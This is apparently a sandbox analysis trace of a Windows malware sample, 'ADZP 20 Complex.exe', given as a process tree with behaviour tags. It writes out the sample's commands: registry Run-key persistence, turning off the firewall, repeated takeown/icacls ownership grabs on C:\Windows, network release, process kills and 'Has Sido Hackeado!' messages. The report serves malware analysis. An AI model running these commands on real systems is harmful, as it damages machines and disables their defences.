C:\Windows\system32\calc.execalc7⤵PID:8208
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:11308
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:11304
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:12404
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:13216
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:13336
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:14224
-
-
-
-
C:\Windows\system32\notepad.exenotepad5⤵PID:6884
-
-
C:\Windows\system32\calc.execalc5⤵PID:6904
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:6920
-
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵PID:6932
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:6944
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C3EC.tmp\C3ED.tmp\C3EE.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:2280
-
-
-
C:\Windows\system32\notepad.exenotepad5⤵PID:6184
-
-
C:\Windows\system32\calc.execalc5⤵PID:6400
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:6156
-
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵PID:6228
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:8760
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:9004
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:548
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:8516
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:8624
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:9012
-
-
-
-
C:\Windows\system32\notepad.exenotepad3⤵PID:2472
-
-
C:\Windows\system32\calc.execalc3⤵PID:1192
-
-
C:\Windows\explorer.exeexplorer.exe3⤵PID:2380
-
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵PID:3204
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"3⤵PID:5112
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\537F.tmp\5380.tmp\5381.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""4⤵PID:3084
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵PID:5948
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵PID:6084
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"5⤵PID:3816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat5⤵PID:1964
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5148
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f5⤵PID:1884
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f5⤵PID:548
-
-
C:\Windows\system32\ipconfig.exeipconfig /release5⤵
- Gathers network information
PID:5284
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f5⤵
- Kills process with taskkill
PID:2560
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*5⤵
- Views/modifies file attributes
PID:2668
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵PID:5180
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵PID:7448
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵PID:7988
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵PID:8024
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!5⤵PID:8044
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:8060
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F25F.tmp\106.tmp\174.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:676
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:2668
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"8⤵PID:8912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:9036
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵PID:9064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵PID:7608
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r8⤵
- Possible privilege escalation attempt
PID:6076
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵PID:5512
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵PID:8424
-
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
PID:6036
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
PID:4704
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*7⤵
- Views/modifies file attributes
PID:9308
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:9636
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:9888
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10072
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:5452
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:6496
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:3636
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10152
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:10464
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:10716
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:11004
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:11040
-
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵PID:7472
-
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵PID:6680
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:8364
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\232E.tmp\232F.tmp\2330.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:7044
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:13408
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:12312
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:10420
-
C:\Windows\System32\Twain_20.dllC:\Windows\System32\Twain_20.dll10⤵PID:8912
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\203B.tmp\203C.tmp\203D.bat C:\Windows\System32\Twain_20.dll"11⤵PID:10236
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵PID:13104
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵PID:9376
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵PID:14596
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:14860
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:9456
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4340
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
PID:14296
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:8
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:9112
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:15228
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:2832
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:11376
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:5816
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵PID:6232
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4232
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:5772
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:1316
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
PID:8020
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵PID:448
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:3592
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:13236
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵PID:3076
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:6044
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:14448
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵PID:1004
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:11780
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵PID:5252
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
PID:12868
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:10872
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵PID:12304
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:11412
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵PID:10668
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵PID:1748
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:14752
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:14772
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
PID:9500
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:8108
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
PID:8104
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:8092
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵PID:11928
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:12464
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
PID:12460
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:5428
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2120
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
PID:9848
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵PID:9468
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:6844
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:13280
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵PID:14888
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵PID:12876
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:12496
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
PID:14840
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:12788
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
PID:9580
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:14904
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:11468
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:7128
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:14320
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3928
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵PID:12640
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵PID:14808
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵PID:9772
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:15068
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
PID:1032
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:15256
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:9112
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:4584
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
PID:3860
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵PID:9876
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:8076
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5780
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:13192
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵PID:448
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
PID:3592
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:1180
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
PID:1184
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:11840
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
PID:6736
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:14736
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5252
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6416
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:11412
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:9720
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:15172
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:12708
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:14772
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:11928
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:6408
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵PID:12628
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:636
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:14056
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:14064
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:13820
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
PID:13984
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:14076
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:13464
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:14316
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
PID:9124
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵PID:12656
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵PID:13724
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
PID:10380
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵PID:11016
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:2380
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:14200
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵PID:5096
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵PID:14780
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
PID:4764
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5372
-
-
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵PID:10940
-
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵PID:13512
-
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
PID:10688
-
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
PID:14692
-
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*9⤵
- Views/modifies file attributes
PID:10320
-
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:8748
-
-
C:\Windows\system32\calc.execalc7⤵PID:920
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:8324
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:8660
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:11352
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3D8C.tmp\3D8D.tmp\3D8E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:11820
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:12608
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"10⤵PID:7944
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:13232
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:2084
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"10⤵PID:3928
-
-
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:11576
-
-
C:\Windows\system32\calc.execalc7⤵PID:11764
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:12080
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:6724
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵PID:12360
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6AA7.tmp\6AA8.tmp\6AA9.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵PID:13296
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:15348
-
C:\Windows\System32\Twain_20.dllC:\Windows\System32\Twain_20.dll10⤵PID:6020
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D0AF.tmp\D0B0.tmp\D0B1.bat C:\Windows\System32\Twain_20.dll"11⤵PID:1488
-
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off9⤵
- Modifies Windows Firewall
PID:9436
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd9⤵PID:14868
-
-
-
-
C:\Windows\system32\notepad.exenotepad7⤵PID:12780
-
-
C:\Windows\system32\calc.execalc7⤵PID:13048
-
-
C:\Windows\explorer.exeexplorer.exe7⤵PID:11180
-
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵PID:12668
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:14380
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:14952
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:2912
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:9312
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵PID:12648
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵PID:15064
-
-
-
-
C:\Windows\system32\notepad.exenotepad5⤵PID:8068
-
-
C:\Windows\system32\calc.execalc5⤵PID:8112
-
-
C:\Windows\explorer.exeexplorer.exe5⤵PID:8124
-
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵PID:8136
-
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵PID:8144
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F260.tmp\E6.tmp\E7.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵PID:7816
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:8808
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd7⤵PID:4808
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵PID:2052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵PID:4884
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r8⤵PID:9340
-
-
-
